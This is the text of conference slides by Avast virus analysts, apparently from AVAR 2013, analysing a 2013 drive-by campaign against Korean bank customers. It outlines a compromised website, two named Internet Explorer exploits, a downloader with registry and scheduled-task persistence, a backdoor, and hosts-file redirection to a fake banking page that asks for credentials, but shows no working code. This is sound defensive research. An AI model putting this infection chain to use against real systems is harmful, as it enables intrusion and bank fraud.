Embed Size (px)
Citation preview
Korean banks under pressureTitle
Jaromír Hořejší[email protected]
www.avast.com
Avar 2013, Chennai
Jan Š[email protected]
Agenda
• Origin of infection• Infection stages• Consequences on a compromised machine• Origin of attackers• Summary• Questions
Origin of infection
• March 2013• Compromised legitimate website• Korean SPC website as a source of infection• Works as a bridge between victims and attackers
website
The first stage of infection
• Content of the compromised SPC website
The first stage of infection
• Source code of common1.js
The first stage of infection
• Screen.js source code contains link to attacker site
Attack website source code
• Contains 3 scripts• One counter for infection statistics• Two scripts with exploits to compromise visitors
computer
The first exploit
• 1.html– CVE-2010-0806– Use-after-free vulnerability in the Peer Objects
component– Works in IE6, 6 SP1 and IE7
Identification of the first exploit
Shellcode executed by the first exploit• No encryption
The second exploit
• Cc.html– CVE-2012-1889– Causes Microsoft XML Core Services to access
uninitialized memory location– Works in IE6, IE7 and possible to extend to work in IE8
and IE9
Identification of the second exploit
Shellcode executed by the second exploit• With encryption
Shellcode executed by the second exploit• Decrypted shellcode
The second stage of infection• A small downloader (15KB) written in Visual Basic• Performs several task on the compromised
computer– Checks internet connection by downloading a file from a
Korean search engine(http://static.naver.net/w9/blank.gif)
– Downloads hosts file redirecting several URL addresses
The second stage of infection
– Increases the statistics counter– Makes itself persistent by modifying Run registry key– Downloads a backdoor file and executes it– Drops and executes a batch file which schedules to run
the second stage downloader in a 30 minute interval
The third stage of infection
• Backdoor with size 1,3MB written in Delphi• Protected by Safengine• Injects itself into iexplorer.exe• Initiates communication via custom
communication protocol• Remote control of a compromised system• Contains many build-in functions
Consequences on the compromised machine• Koonmin Bank’s website on the compromised
computer
Consequences on the compromised machine• Original and modified website
Consequences on the compromised machine• Victim asked for personal credentials
Origin of the attackers
• Probably Chinese speaking individuals
Summary
• Growing number of bank frauds• Using compromised legitimate websites• Using more than one exploit• Combination of fraud attack and remote control• Probably known origin of attackers
Questions & Answers
• Questions?
Thank you
Jan Sirmer ([email protected])Virus Analyst & ResearcherJaromir Horejsi([email protected])Virus Analyst & Researcher
